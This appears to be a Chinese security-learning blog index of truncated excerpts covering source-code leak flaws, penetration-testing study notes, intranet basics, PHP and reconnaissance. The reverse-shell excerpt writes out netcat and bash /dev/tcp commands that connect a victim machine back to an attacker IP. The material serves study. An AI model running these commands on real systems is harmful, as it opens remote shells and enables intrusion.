WEB源码泄露漏洞常见的web源码泄露 git源码泄露 svn源码泄露 DS_Store 文件泄露 网站备份压缩文件泄露 WEB-INF/web.xml 泄露 CVS泄露 hg源码泄漏 Bazaar/bzr泄露 SWP 文件泄露 env泄露 1.git 源码泄露 Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等。 发布代码的时候,如果没有把.git这个目录删除,就直接发布到了服务器上,攻击者就可以通过它来恢复源代码 .git目录结构如下: HEAD: 这个git项目当前处在哪个分
深信服安全服务认证工程师学习笔记第一章 网络安全基础第一部分 网络安全基础第二部分 操作系统配置与应用第三部分 计算机网络原理与应用第二章 网络渗透测试基础第一部分 渗透测试概述2.1.1 渗透测试标准与流程渗透测试概述 渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击的技术与方法,挫败目标系统的安全控制措施并获得控制访问权的安全测试方法。 网络渗透测试主要依据CVE(Common Vulnerabilities and Exposures)已经发现的安全漏洞,模拟入侵者的攻击方法对网站应用、服务器系统和网络设备进行非破坏性质的攻击性测试。 CVE
内网渗透内网基础知识工作组工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组 域域:用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合( 安全边界,意思是在两个域中,一个域中的用户无法访问另一个域中的资源)。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个**更加严格的安全管理控制机制**,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用
反弹Shell方法场景 由于防火墙等的控制访问策略,客户端无法访问服务端,但服务端可以向外网发起请求 IP会动态变化,攻击机无法直接连接 向局域网中的主机散播木马病毒等,网络环境未知的情况下 服务端的AV对正向连接的流量检测非常严格,但是对出网流量校验不足 反弹方式Netcat(nc) 攻击机监听端口 1nc -lvp 2333 受害机执行反弹命令 1nc 攻击机IP 攻击机监听端口 -e /bin/bash Bash 攻击机监听端口 1nc -lvp 2333 在受害机执行: 1234567payload1:bash -i >& /dev/tcp/攻击机
PHP学习1.PHP简述 PHP:超文本预处理器 通用开源脚本语言 php的使用: PHP 可以生成动态页面内容 PHP 可以创建、打开、读取、写入、关闭服务器上的文件 PHP 可以收集表单数据 PHP 可以发送和接收 cookies PHP 可以添加、删除、修改您的数据库中的数据 PHP 可以限制用户访问您的网站上的一些页面 PHP 可以加密数据 2.基本语法格式 PHP 脚本以 <?php 开始,以 ?> 结束 static的关键字的使用 当一个函数完成时,它的所有变量通常都会被删除。 然而,有时候您希望某个局部变量不要被删除。 要做到这一点,请在您第一次声明变量
信息收集1.简介 信息收集是渗透测试的前期主要工作,是非常重要的环节,收集足够多的信息才能方便接下来的测试,信息收集主要是收集网站的域名信息、子域名信息、目标网站信息、目标网站真实IP、敏感/目录文件、开放端口和中间件信息等等。通过各种渠道和手段尽可能收集到多的关于这个站点的信息,有助于我们更多的去找到渗透点,突破口。 2.信息收集分类 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等) dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化
